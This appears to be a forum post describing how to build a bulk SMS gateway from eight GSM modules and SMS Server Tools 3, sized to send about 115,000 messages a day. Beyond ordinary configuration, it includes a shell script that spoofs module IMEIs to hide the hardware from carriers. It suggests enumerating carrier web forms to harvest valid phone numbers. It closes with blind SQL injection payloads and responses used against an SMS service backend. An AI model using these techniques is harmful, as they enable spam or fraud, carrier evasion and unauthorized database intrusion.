Had a task to setup SMS gateway powered by eight Quectel M35 GSM/GPRS modules. The choice was M35 because 2G bands work on this network service provider and due to well written documentation on this chip. After carefully looking through available SMS gateway software, decided to go with SMS Server Tools 3 due to it's stability, good documentation and command line interface only. The SMS gateway is connected to a single-board computer via USB AB cable.
The device is detected with the `cdc_acm` kernel driver even though it's an AT command device.
Shared memory allocator library `libmm` is a requirement for statistics support in SMSd. I've had some issues building it on NetBSD.
The SMSd Makefile is located in the src directory. Modify CFLAGS to include `libmm`, and the `NUMBER_OF_MODEMS`, the maximum is 64.
To simplify activation of hundred SIM cards, I have written a small shell script. Prepare IMEI list in `imei.txt`, one per line. The script automatically sets an unused IMEI to the module, then asks for the phone number and PIN that is stored together with IMEI for reference. Checks are added for almost every step. The SIM PIN is removed for easier maintenance and a call to the phone number itself is made to activate the SIM card, returns busy and takes no balance. An invalid IMEI is likely not to be accepted by the service network provider, module too. The script takes the first argument which should be an existing ttyACM device. It's not intended to insert SIM card until the script says so, this is to prevent original IMEI leaking to service provider. The script uses `socat` to communicate with the modem via `AT` commands.
Here is the SMSd configuration (/etc/smsd.conf) after many days of configuring, testing and optimizing. Read it very carefully.
Refer to the official documentation: https://smstools3.kekekasvi.com/index.php?p=configure
With this configuration it's possible to send ~450-700 messages per module per hour, given that our device has eight modules aprox 115,000 messages per day. The speed depends on phone number database quality, network registration status checking (`check_network`), delivery reports and other factors. At times some modules can behave differently in terms of speed.
The UTF character set use two bytes thus lowering the amount of characters that can be sent in one message. The encoding is set on the whole message. If you do not need UTF, use ASCII (default).
Queues can be used to differentiate between multiple service network providers and to reduce sending costs by detecting the receiver phone number network and placing the message in correct queue. The load-balancing shell script can be useful for such tasks, mentioned later.
Some message storage is faster than other (SM, MT, ME), and some might not even work correctly on your device.
The whitelist/blacklist is useful when blocking numbers that opted out on receiving SMS.
Each GSM interface can be configured independently, however they all include the `[default]` section.
The event handler is executed after receiving an event. It modifies the sent message file with information from the delivery report. The intention is to have clean reports. It might be required to build `formail` unless it exists in your package manager.
If i recall correctly, the SMSd checks the shell script exit code.
Check shell script (`checkhandler`) is executed before sending a message which can be used as load-balancer across multiple modules. Due to my sending script design, the checkhandler is not used anymore. It's added here for reference.
The following shell script is used to initiate sending, which places a message formatted file in a queue that SMSd picks up and processes. Numbers are loaded in international format from the `numbers.txt` file. The modem or queue that should process the message can be defined by placing the message file in the correct `WORKDIR`, or by defining `MODEM` and/or `QUEUE` variable in the message file. From what I remember the values in the message file override the `WORKDIR`. `Report:` overrides `report` in smsd configuration.
This is how a successfully delivered message report looks like. Notice the `Received` value, remember that this comes from the event handler script that exported the value from the status report file and added it in the main message file.
If the SMSd has been built with `libmm`, then statistics should be available.
It's possible to display status monitor in live mode using the `-s` option.
Here is how a missed call looks like;
This is the SMSd sending log to get some understanding on the process.
The network provider website most likely has a form to add credit to the SIM card, a form to add the phone number to track credit or internet traffic usage, a form to upgrade your prepaid number, a contact form or something similar. These places could have the backend enumerate ranges of random numbers which can be useful for checking valid/used/activated numbers before sending, a simple shellcode `for range in {00000..99999}` would do. On some providers it was possible to make distinction between business and private mobile phone numbers through a form that offers services to business users only. Furthermore another possibility is to reverse an android application and find out API endpoints for number validation.
Database injection over SMS
# payload: keyword
# response: OK
# payload: keyword123
# response: invalid keyword specified
# payload: keyword123/#%"!$([/=*]){}:,'.;&
# response: no
Character `'` breaks backend.
The SMS service responds to requests with `1` and `0` being `true` and `false`.
# payload: keyword\\\\\\\\\\'
# response: no
# payload: keyword' or 1=1--
# response: no
# payload: keyword' or 1=2--'
# response: 0
# payload: keyword' or 1=1--'
# response: 1
# payload: keyword' or sleep(30)--'
# response: 1 (30 seconds later)
# payload: keyword' and substring(@@version, 1, 1)=5--'
# response: 0
# payload: keyword' and substring(@@version, 1, 1)=4--'
# response: 1
The device is detected with the `cdc_acm` kernel driver even though it's an AT command device.
Bash:
[ 308.213583] usb 1-1.3: new high-speed USB device number 5 using dwc_otg
[ 308.314327] usb 1-1.3: New USB device found, idVendor=1a40, idProduct=0201, bcdDevice= 1.00
[ 308.314347] usb 1-1.3: New USB device strings: Mfr=0, Product=1, SerialNumber=0
[ 308.314361] usb 1-1.3: Product: USB 2.0 Hub [MTT]
[ 308.315233] hub 1-1.3:1.0: USB hub found
[ 308.315450] hub 1-1.3:1.0: 7 ports detected
[ 308.625586] usb 1-1.3.1: new full-speed USB device number 6 using dwc_otg
[ 308.748111] usb 1-1.3.1: New USB device found, idVendor=04e2, idProduct=1414, bcdDevice= 0.03
[ 308.748136] usb 1-1.3.1: New USB device strings: Mfr=0, Product=0, SerialNumber=0
[ 308.771313] cdc_acm 1-1.3.1:1.0: ttyACM0: USB ACM device
[ 308.772557] cdc_acm 1-1.3.1:1.2: ttyACM1: USB ACM device
[ 308.773729] cdc_acm 1-1.3.1:1.4: ttyACM2: USB ACM device
[ 308.774931] cdc_acm 1-1.3.1:1.6: ttyACM3: USB ACM device
[ 308.775673] usbcore: registered new interface driver cdc_acm
[ 308.775686] cdc_acm: USB Abstract Control Model driver for USB modems and ISDN adapters
[ 308.853622] usb 1-1.3.2: new full-speed USB device number 7 using dwc_otg
[ 308.975991] usb 1-1.3.2: New USB device found, idVendor=04e2, idProduct=1414, bcdDevice= 0.03
[ 308.976013] usb 1-1.3.2: New USB device strings: Mfr=0, Product=0, SerialNumber=0
[ 308.978515] cdc_acm 1-1.3.2:1.0: ttyACM4: USB ACM device
[ 308.980859] cdc_acm 1-1.3.2:1.2: ttyACM5: USB ACM device
[ 308.984521] cdc_acm 1-1.3.2:1.4: ttyACM6: USB ACM device
[ 308.994200] cdc_acm 1-1.3.2:1.6: ttyACM7: USB ACM deviceShared memory allocator library `libmm` is a requirement for statistics support in SMSd. I've had some issues building it on NetBSD.
The SMSd Makefile is located in the src directory. Modify CFLAGS to include `libmm`, and the `NUMBER_OF_MODEMS`, the maximum is 64.
Makefile:
CFLAGS = -D NUMBER_OF_MODEMS=8
CFLAGS += -I/usr/local/include -L/usr/local/lib
CFLAGS += -fcommon
CFLAGS += -D_FILE_OFFSET_BITS=64
all: smsd
smsd: smsd.c extras.o locking.o cfgfile.o logging.o alarm.o smsd_cfg.o charset.o stats.o blacklist.o whitelist.o modeminit.o pdu.o charshift.o
ifneq (,$(findstring SOLARIS,$(CFLAGS)))
ifeq (,$(findstring DISABLE_INET_SOCKET,$(CFLAGS)))
override LFLAGS += -lsocket -lnsl
endif
endif
ifneq (,$(findstring NOSTATS,$(CFLAGS)))
$(CC) $(CFLAGS) -o $@ $^ $(LFLAGS)
else
$(CC) `mm-config --cflags` $(CFLAGS) -o $@ $^ `mm-config --ldflags --libs` $(LFLAGS)
endif
clean:
rm -f *.o smsd *~To simplify activation of hundred SIM cards, I have written a small shell script. Prepare IMEI list in `imei.txt`, one per line. The script automatically sets an unused IMEI to the module, then asks for the phone number and PIN that is stored together with IMEI for reference. Checks are added for almost every step. The SIM PIN is removed for easier maintenance and a call to the phone number itself is made to activate the SIM card, returns busy and takes no balance. An invalid IMEI is likely not to be accepted by the service network provider, module too. The script takes the first argument which should be an existing ttyACM device. It's not intended to insert SIM card until the script says so, this is to prevent original IMEI leaking to service provider. The script uses `socat` to communicate with the modem via `AT` commands.
Bash:
#!/bin/bash
for i in $1; do
DEVICE="/dev/ttyACM$i,crnl"
echo "AT" | socat - ${DEVICE}
echo "# Switch modem state"
STATE=$(echo "AT+CFUN=4" | socat - ${DEVICE} | grep -Eo 'OK')
[ "${STATE}" != "OK" ] && exit
echo "# Check network state"
NETWORK_STATE=$(echo "AT+COPS?" | socat - ${DEVICE} | grep -o "+COPS: 0")
[ "${NETWORK_STATE}" != "+COPS: 0" ] && exit
echo "# Check module status"
STATUS=$(echo "AT" | socat - ${DEVICE} | grep -Eo 'OK')
[ "${STATUS}" != "OK" ] && exit
echo "# Spoof IMEI"
CHIP_IMEI=$(echo "AT+CGSN" | socat - ${DEVICE} | grep -Eo '[0-9]+')
[ ${#CHIP_IMEI} -ne 15 ] && exit
UNUSED_IMEI=$(cat imei.txt | grep -v '|' | head -n 1)
SET_IMEI=$(echo "AT+EGMR=1,7,\"${UNUSED_IMEI}\"" | socat - ${DEVICE})
echo "AT+CFUN=0" | socat - ${DEVICE}
echo "AT+CFUN=4" | socat - ${DEVICE}
SPOOFED_IMEI=$(echo "AT+CGSN" | socat - ${DEVICE} | grep -Eo '[0-9]+')
[ "${SPOOFED_IMEI}" != "${UNUSED_IMEI}" ] && exit
echo
echo "CHIP_IMEI: ${CHIP_IMEI}"
echo "SPOOFED_IMEI: ${SPOOFED_IMEI}"
echo "# Insert SIM card"
while true; do
SIM_STATE=$(echo "AT+CPIN?" | socat - ${DEVICE} | grep -o "ERROR")
if [ "${SIM_STATE}" != "ERROR" ]; then
break
fi
echo "Waiting."
sleep 5
done
echo "# Insert SIM card number"
read "SIMNUM"
echo "# Insert SIM card PIN"
read "SIMPIN"
echo "# Inserted"
sed -i "/${UNUSED_IMEI}/s/$/|${SIMNUM}|${SIMPIN}/" imei.txt
echo "# Switch modem state"
STATE=$(echo "AT+CFUN=1" | socat - ${DEVICE} | grep -Eo 'OK$')
[ "${STATE}" != "OK" ] && exit
echo "# Enter SIM card PIN"
echo "AT+CPIN=\"${SIMPIN}\"" | socat - ${DEVICE}; sleep 3
echo "AT+CLCK=\"SC\",0,\"${SIMPIN}\"" | socat - ${DEVICE}; sleep 15
echo "# Activate SIM card"
echo "ATD${SIMNUM}" | socat - ${DEVICE}; sleep 5
echo "ATH" | socat - ${DEVICE}; sleep 10
echo -e "AT+CMGF=1 \n AT+CMGL=\"ALL\" \n AT+CPMS?" | socat - ${DEVICE}
doneHere is the SMSd configuration (/etc/smsd.conf) after many days of configuring, testing and optimizing. Read it very carefully.
Refer to the official documentation: https://smstools3.kekekasvi.com/index.php?p=configure
Код:
# the modules configured
devices = GSM1, GSM2, GSM3
# directory structure
outgoing = /home/smsd/sms/outgoing
checked = /home/smsd/sms/checked
incoming = /home/smsd/sms/incoming
failed = /home/smsd/sms/failed
sent = /home/smsd/sms/sent
phonecalls = /home/smsd/sms/calls
report = /home/smsd/sms/report
infofile = /home/smsd/smsd/smsd.info
pidfile = /home/smsd/smsd/smsd.pid
stats = /home/smsd/smsd/stats
# logging
loglevel = 7
logfile = /home/smsd/smsd/smsd.log
# drop privileges
user = smsd
group = dialout
umask = 077
# pre-processing / load-balancer
# checkhandler = /home/smsd/scripts/check.sh
# see exact data which is received from the modem
log_read_from_modem = yes
# timestamp and uptime are printed to the end of status file
status_include_uptime = yes
# INFO: empty the first SIM card memory before sending SM (default: no)
# NOTE: appears to slow down sending
# receive_before_send = yes
#errorsleeptime = 5
# wait after consecutive failed sends
blockafter = 100
blocktime = 3600
#blacklist = /etc/smstools/blacklist
#whitelist = /etc/smstools/whitelist
# messages using iso or gsm are stored as utf8
#alphabet = UTF
incoming_utf8 = yes
# speed
#logtime_us = yes
#logtime_ms = yes
#log_read_timing = yes
trust_outgoing = yes
[queues]
MAIN = /home/smsd/sms/queues/main
GSM1 = /home/smsd/sms/queues/q1
GSM2 = /home/smsd/sms/queues/q2
GSM3 = /home/smsd/sms/queues/q3
[default]
# INFO: the CNMI is modified here to route status reports from the modem to the SMSd.
init = AT+CPMS="SM","SM","SM";+CNMI=2,1,0,1,0
# INFO: new message priority checking | 0 = no | 1 = normal priority | 2 = high priority
incoming = 1
baudrate = 115200
# INFO: CMGL is used to check messages, message is deleted after it is read
# NOTE: when '5' is used, incoming UTF-8 incoming messages appear as multipart where parts never arrive and SMS stay on SM
check_memory_method = 3
# INFO: 1 = network registration is always checked | 2 = network registration is checked only when preparing to send messages. This is how we know we have been blocked rather than just send without checking.
check_network = 2
# time_to_send_pdu = read_timeout * read_timeout_pdu
#read_timeout = 5
#read_timeout_pdu = 8
pin = ignore
report_device_details = yes
send_retries = 0
decode_unicode_text = yes
# speed
#poll_faster = 5
#delaytime = 3
# reporting
report = yes # should be yes for reporting to work
detect_message_routing = yes # should be yes for reporting to work
routed_status_report_cnma = no
using_routed_status_report = no
# log and hangup incoming calls
phonecalls = clip
hangup_incoming_call = yes
# event
eventhandler = /home/smsd/scripts/event.sh
[GSM1]
device = /dev/ttyACM0
queues = GSM1, MAIN
[GSM2]
device = /dev/ttyACM1
queues = GSM2, MAIN
[GSM3]
device = /dev/ttyACM2
queues = GSM3, MAINWith this configuration it's possible to send ~450-700 messages per module per hour, given that our device has eight modules aprox 115,000 messages per day. The speed depends on phone number database quality, network registration status checking (`check_network`), delivery reports and other factors. At times some modules can behave differently in terms of speed.
The UTF character set use two bytes thus lowering the amount of characters that can be sent in one message. The encoding is set on the whole message. If you do not need UTF, use ASCII (default).
Queues can be used to differentiate between multiple service network providers and to reduce sending costs by detecting the receiver phone number network and placing the message in correct queue. The load-balancing shell script can be useful for such tasks, mentioned later.
Some message storage is faster than other (SM, MT, ME), and some might not even work correctly on your device.
The whitelist/blacklist is useful when blocking numbers that opted out on receiving SMS.
Each GSM interface can be configured independently, however they all include the `[default]` section.
The event handler is executed after receiving an event. It modifies the sent message file with information from the delivery report. The intention is to have clean reports. It might be required to build `formail` unless it exists in your package manager.
Bash:
#!/bin/bash
###
# Update sent file with information from status report (well tested)
###
if [ "$1" = "REPORT" ]; then
SENTDIR=/home/smsd/sms/sent
if grep "Status: 0" $2 >/dev/null; then
FROM=`formail -zx From: < $2`
RECEIVED=`formail -zx Received: < $2`
TMPFILE=`mktemp /tmp/smsd_XXXXXX`
formail -I "" < $2 | sed -e"1,2d" > $TMPFILE
MESSAGE_ID=`formail -zX Message_id: < $TMPFILE`
grep -lx "$MESSAGE_ID" $SENTDIR/* > $TMPFILE
cat $TMPFILE | while read FNAME; do
OLDRECEIVED=`formail -zx Received: < ${FNAME}`
if [ "$OLDRECEIVED" = "" ]; then
TO=`formail -zx To: < ${FNAME} | sed 's/+/00/'`
if [ "$TO" = "$FROM" ]; then
TMPFILE2=`mktemp /tmp/smsd_XXXXXX`
cp ${FNAME} $TMPFILE2
formail -f -I "Received: $RECEIVED" < $TMPFILE2 > ${FNAME}
unlink $TMPFILE2
fi
fi
done
unlink $TMPFILE
fi
fi
###
# Reply with SMS to incoming phone call (untested)
###
#if [ "$1" = "CALL" ]; then
#TO=$(formail -zx From: <$2)
#FILE=$(mktemp /tmp/send_XXXXXX)
#echo "To: $TO" > $FILE
#echo "" >> $FILE
#echo "This number only accepts SMS." >> $FILE
#FILE2=$(mktemp /home/smsd/sms/outgoing/send_XXXXXX)
#mv $FILE $FILE2
#fi
exit 0If i recall correctly, the SMSd checks the shell script exit code.
Check shell script (`checkhandler`) is executed before sending a message which can be used as load-balancer across multiple modules. Due to my sending script design, the checkhandler is not used anymore. It's added here for reference.
Bash:
#!/bin/bash
# Directory where modem statistics are stored.
STATSDIR="/home/smsd/smsd/stats"
QUEUESDIR="/home/sms/queues"
# Modems and their corresponding queues.
MODEMS=("GSM1" "GSM2")
QUEUES=("GSM1" "GSM2")
# Verify that the number of modems equals the number of queues.
if [ ${#MODEMS[@]} -ne ${#QUEUES[@]} ]; then
echo "ERROR: The number of modems and queues must match."
exit 1
fi
# Function to get the message count for a given modem.
get_modem_count() {
local queue=$1
local counter=$(find "$QUEUSEDIR/$queue" -maxdepth 1 -type f | wc -l)
echo $counter
}
# Main function to determine the appropriate queue for the message.
assign_to_queue() {
local message_file=$1
local queue_assigned=$(formail -zx Queue: < "$message_file" || formail -zx Provider: < "$message_file")
# Skip queue assignment if it's already defined.
if [ -n "$queue_assigned" ]; then
return
fi
local lowest_count=-1
local selected_queue=""
# Find the queue associated with the modem having the lowest message count.
for i in "${!QUEUES[@]}"; do
local count=$(get_modem_count "${QUEUES[$i]}")
if [[ $lowest_count -eq -1 || $count -lt $lowest_count ]]; then
lowest_count=$count
selected_queue=${QUEUES[$i]}
fi
done
# Assign the message to the determined queue.
if [ -n "$selected_queue" ]; then
local temp_file=$(mktemp)
cp "$message_file" "$temp_file"
formail -f -I "Queue: $selected_queue" < "$temp_file" > "$message_file"
rm "$temp_file"
fi
}
# Execute the main function with the path to the message file as an argument.
assign_to_queue "$1"
sleep 1; exit 0The following shell script is used to initiate sending, which places a message formatted file in a queue that SMSd picks up and processes. Numbers are loaded in international format from the `numbers.txt` file. The modem or queue that should process the message can be defined by placing the message file in the correct `WORKDIR`, or by defining `MODEM` and/or `QUEUE` variable in the message file. From what I remember the values in the message file override the `WORKDIR`. `Report:` overrides `report` in smsd configuration.
Bash:
WORKDIR="/home/smsd/sms/queues/q3"
MESSAGE="Hello World"
MODEM="GSM1"
QUEUE="GSM1"
while read -r NUMBER; do
FILENAME="${WORKDIR}/$(date +%Y%m%d-%T.%N).txt"
echo "To: ${NUMBER}" >> $FILENAME
#echo "Modem: ${MODEM}" >> $FILENAME
#echo "Queue: ${MODEM}" >> $FILENAME
#echo "Report: no" >> $FILENAME
echo "" >> $FILENAME
echo "${MESSAGE}" >> $FILENAME
done < numbers.txtThis is how a successfully delivered message report looks like. Notice the `Received` value, remember that this comes from the event handler script that exported the value from the status report file and added it in the main message file.
Bash:
-bash-5.2# cat 20241004-13:21:27.996134917.txt
To: +40731234567
Modem: GSM1
Sent: 24-10-04 13:21:30
Sending_time: 3
Message_id: 242
IMSI: xxxxxxxxxxxxxxx
IMEI: xxxxxxxxxxxxxxx
Received: 24-10-04 13:23:17
Hello WorldIf the SMSd has been built with `libmm`, then statistics should be available.
Bash:
-bash-5.2# ls -la /home/smsd/smsd/stats
total 96
drwxr-xr-x 2 smsd users 4096 Oct 4 2024 .
drwx------ 3 smsd users 4096 Oct 4 2024 ..
-rw------- 1 smsd users 163 Oct 4 2024 241004.080000
-rw------- 1 smsd users 164 Oct 4 2024 241004.090000
-rw------- 1 smsd users 155 Oct 4 2024 241004.100000
-rw------- 1 smsd users 152 Oct 4 2024 241004.110000
-rw------- 1 smsd users 159 Oct 4 2024 241004.120000
-rw------- 1 smsd users 163 Oct 4 2024 241004.130000
-rw------- 1 smsd users 11 Oct 4 2024 GSM1.counter
-rw------- 1 smsd users 11 Oct 4 2024 GSM2.counter
-rw------- 1 smsd users 11 Oct 4 2024 GSM3.counter
-rw------- 1 smsd users 416 Oct 4 2024 stats.tmp
-bash-5.2# cat *.counter
GSM1: 9355
GSM2: 9267
GSM3: 7192
-bash-5.2# cat 241004.130000
runtime,rejected
3567,0
name,succeeded,failed,received,multiple_failed,usage_s,usage_r
GSM1,542,2,530,0,2785,31
GSM2,533,1,481,0,2765,19
GSM3,550,0,475,0,2796,16It's possible to display status monitor in live mode using the `-s` option.
Bash:
-bash-5.2# smsd -h
smsd spools incoming and outgoing sms.
Options:
-a ask config settings
-cx set config file to x
-Dx decode GSM 7bit Packed string x
-Ex encode string x to GSM 7bit Packed format
-ix set infofile to x
-px set pidfile to x
-lx set logfile to x
-nx set process name argument to x
-ux set username to x
-gx set groupname to x
-h, -? show this help
-s display status monitor
-t run smsd in terminal
-Cx Communicate with device x
-V print copyright and versionHere is how a missed call looks like;
Bash:
-bash-5.2# cat GSM1.Bp96I8
From: 40731234567
From_TOA: 73 international, ISDN/telephone
Subject: GSM1
Modem: GSM1
IMSI: xxxxxxxxxxxxxxx
IMEI: xxxxxxxxxxxxxxx
Call_type: missed
Received: 24-10-04 13:25:59
CALL MISSEDThis is the SMSd sending log to get some understanding on the process.
Bash:
2024-10-04 00:00:00,2, smsd: Smsd v3.1.21 started.
2024-10-04 00:00:00,2, smsd: Running as smsd:users (1003:100).
2024-10-04 00:00:00,7, smsd: Running startup_check (shell): /home/smsd/sms/incoming/smsd_script.70K5LD /tmp/smsd_data.MtOPdP
2024-10-04 00:00:00,7, smsd: Done: startup_check (shell), execution time 0 sec., status: 0 (0)
2024-10-04 00:00:00,4, smsd: File mode creation mask: 077 (0600, rw-------).
2024-10-04 00:00:00,2, smsd: Running in terminal mode.
2024-10-04 00:00:00,5, smsd: Outgoing file checker has started. PID: 1632.
2024-10-04 00:00:00,7, smsd: All PID's: 1632,1635
2024-10-04 00:00:00,5, GSM1: Modem handler 0 has started. PID: 1635.
2024-10-04 00:00:00,5, GSM1: Serving queues: GSM1, MAIN
2024-10-04 00:00:00,5, GSM1: Using check_memory_method 3: CMGL is used.
2024-10-04 00:00:00,5, GSM1: Using send_retries 0.
2024-10-04 00:00:00,5, GSM1: Using delaytime 3 sec.
2024-10-04 00:00:00,6, GSM1: I have to send 1 short message for /home/smsd/sms/queues/q1/20241004-13:21:27.996134917.txt
2024-10-04 00:00:00,6, GSM1: Sending SMS from to 40731234567
2024-10-04 00:00:00,6, GSM1: Checking if modem is ready
2024-10-04 00:00:00,7, GSM1: -> AT
2024-10-04 00:00:00,7, GSM1: <- OK
2024-10-04 00:00:00,6, GSM1: Pre-initializing modem
2024-10-04 00:00:00,7, GSM1: -> ATE0
2024-10-04 00:00:00,7, GSM1: <- OK
2024-10-04 00:00:00,7, GSM1: -> AT+CMEE=1;+CLIP=1;+CREG=2
2024-10-04 00:00:00,7, GSM1: <- OK
2024-10-04 00:00:00,6, GSM1: Initializing modem
2024-10-04 00:00:00,7, GSM1: -> AT+CPMS="SM","SM","SM";+CNMI=2,1,0,1,0
2024-10-04 00:00:00,7, GSM1: <- +CPMS: 0,20,0,20,0,20 OK
2024-10-04 00:00:00,7, GSM1: -> AT+CSQ
2024-10-04 00:00:00,7, GSM1: <- +CSQ: 21,0 OK
2024-10-04 00:00:00,6, GSM1: Signal Strength Indicator: (21,0) -71 dBm (Excellent), Bit Error Rate: less than 0.2 %
2024-10-04 00:00:00,6, GSM1: Checking if Modem is registered to the network
2024-10-04 00:00:00,7, GSM1: -> AT+CREG?
2024-10-04 00:00:00,7, GSM1: <- +CREG: 2,1,"xxxx","xxxx" OK
2024-10-04 00:00:00,6, GSM1: Modem is registered to the network
2024-10-04 00:00:00,6, GSM1: Location area code: xxxx, Cell ID: xxxx
2024-10-04 00:00:00,7, GSM1: -> AT+CSQ
2024-10-04 00:00:00,7, GSM1: <- +CSQ: 21,0 OK
2024-10-04 00:00:00,6, GSM1: Signal Strength Indicator: (21,0) -71 dBm (Excellent), Bit Error Rate: less than 0.2 %
2024-10-04 00:00:00,6, GSM1: Selecting PDU mode
2024-10-04 00:00:00,7, GSM1: -> AT+CMGF=0
2024-10-04 00:00:00,7, GSM1: <- OK
2024-10-04 00:00:00,7, GSM1: -> AT+CGSN
2024-10-04 00:00:00,7, GSM1: <- xxxxxxxxxxxxxx OK
2024-10-04 00:00:00,5, GSM1: IMEI: xxxxxxxxxxxxxx
2024-10-04 00:00:00,7, GSM1: -> AT+CIMI
2024-10-04 00:00:00,7, GSM1: <- xxxxxxxxxxxxxxx OK
2024-10-04 00:00:00,5, GSM1: IMSI: xxxxxxxxxxxxxxx
2024-10-04 00:00:00,6, GSM1: Checking if reading of messages is supported
2024-10-04 00:00:00,7, GSM1: -> AT+CPMS?
2024-10-04 00:00:00,7, GSM1: <- +CPMS: "SM",0,20,"SM",0,20,"SM",0,20 OK
2024-10-04 00:00:00,7, GSM1: ## Start of device details
2024-10-04 00:00:00,7, GSM1: # Manufacturer identification:
2024-10-04 00:00:00,7, GSM1: -> AT+CGMI
2024-10-04 00:00:00,7, GSM1: <- Quectel_Ltd
2024-10-04 00:00:00,7, GSM1: # Model identification:
2024-10-04 00:00:00,7, GSM1: -> AT+CGMM
2024-10-04 00:00:00,7, GSM1: <- Quectel_M35
2024-10-04 00:00:00,7, GSM1: # Revision identification:
2024-10-04 00:00:00,7, GSM1: -> AT+CGMR
2024-10-04 00:00:00,7, GSM1: <- Revision: M35AR01A36
2024-10-04 00:00:00,7, GSM1: # New message indications, list of supported modes:
2024-10-04 00:00:00,7, GSM1: -> AT+CNMI=?
2024-10-04 00:00:00,7, GSM1: <- +CNMI: (0-3),(0-3),(0,2,3),(0,1),(0,1)
2024-10-04 00:00:00,7, GSM1: # New message indications, current settings:
2024-10-04 00:00:00,7, GSM1: -> AT+CNMI?
2024-10-04 00:00:00,7, GSM1: <- +CNMI: 2,1,0,1,0
2024-10-04 00:00:00,7, GSM1: # Preferred message storage, list of supported mem's:
2024-10-04 00:00:00,7, GSM1: -> AT+CPMS=?
2024-10-04 00:00:00,7, GSM1: <- +CPMS: ("SM", "ME", "MT"), ("SM", "ME", "MT"), ("SM", "ME", "MT")
2024-10-04 00:00:00,7, GSM1: # Phonebook storage, available mem's:
2024-10-04 00:00:00,7, GSM1: -> AT+CPBS=?
2024-10-04 00:00:00,7, GSM1: <- +CPBS: ("MC","RC","DC","LA","ME","BN","SD","VM","FD","LD","ON","SM")
2024-10-04 00:00:00,7, GSM1: # List messages, list of supported stat's:
2024-10-04 00:00:00,7, GSM1: -> AT+CMGL=?
2024-10-04 00:00:00,7, GSM1: <- +CMGL: (0-4)
2024-10-04 00:00:00,7, GSM1: # Delete message, list of supported values:
2024-10-04 00:00:00,7, GSM1: -> AT+CMGD=?
2024-10-04 00:00:00,7, GSM1: <- +CMGD: (1-20),(0-4)
2024-10-04 00:00:00,7, GSM1: # Phone activity status, list of supported stat's:
2024-10-04 00:00:00,7, GSM1: -> AT+CPAS=?
2024-10-04 00:00:00,7, GSM1: <- +CPAS: (0,2,3,4)
2024-10-04 00:00:00,7, GSM1: # TE character set, list of supported charset's:
2024-10-04 00:00:00,7, GSM1: -> AT+CSCS=?
2024-10-04 00:00:00,7, GSM1: <- +CSCS: ("GSM","HEX","IRA","PCCP437","UCS2","8859-1")
2024-10-04 00:00:00,7, GSM1: # TE character set, current setting:
2024-10-04 00:00:00,7, GSM1: -> AT+CSCS?
2024-10-04 00:00:00,7, GSM1: <- +CSCS: "GSM"
2024-10-04 00:00:00,7, GSM1: ## End of device details
2024-10-04 00:00:00,7, GSM1: -> AT+CMGS=112
2024-10-04 00:00:00,7, GSM1: <- >
2024-10-04 00:00:00,7, GSM1: -> PDU_REMOVED
2024-10-04 00:00:00,7, GSM1: <- +CMGS: 0 OK
2024-10-04 00:00:00,5, GSM1: SMS sent, Message_id: 0, To: 40731234567, sending time 3 sec.
2024-10-04 00:00:00,6, GSM1: SMS To: XXXXXXXXXX. Moved file /home/smsd/sms/queues/q1/20241004-13:21:27.996134917.txt to /home/smsd/sms/sent/20241004-13:21:27.996134917.txt
2024-10-04 00:00:00,7, GSM1: Running eventhandler: /home/smsd/scripts/event.sh SENT /home/smsd/sms/sent/20241004-13:21:27.996134917.txt 0
2024-10-04 00:00:00,7, GSM1: Done: eventhandler, execution time 0 sec., status: 0 (0)The network provider website most likely has a form to add credit to the SIM card, a form to add the phone number to track credit or internet traffic usage, a form to upgrade your prepaid number, a contact form or something similar. These places could have the backend enumerate ranges of random numbers which can be useful for checking valid/used/activated numbers before sending, a simple shellcode `for range in {00000..99999}` would do. On some providers it was possible to make distinction between business and private mobile phone numbers through a form that offers services to business users only. Furthermore another possibility is to reverse an android application and find out API endpoints for number validation.
Database injection over SMS
# payload: keyword
# response: OK
# payload: keyword123
# response: invalid keyword specified
# payload: keyword123/#%"!$([/=*]){}:,'.;&
# response: no
Character `'` breaks backend.
The SMS service responds to requests with `1` and `0` being `true` and `false`.
# payload: keyword\\\\\\\\\\'
# response: no
# payload: keyword' or 1=1--
# response: no
# payload: keyword' or 1=2--'
# response: 0
# payload: keyword' or 1=1--'
# response: 1
# payload: keyword' or sleep(30)--'
# response: 1 (30 seconds later)
# payload: keyword' and substring(@@version, 1, 1)=5--'
# response: 0
# payload: keyword' and substring(@@version, 1, 1)=4--'
# response: 1
Последнее редактирование:
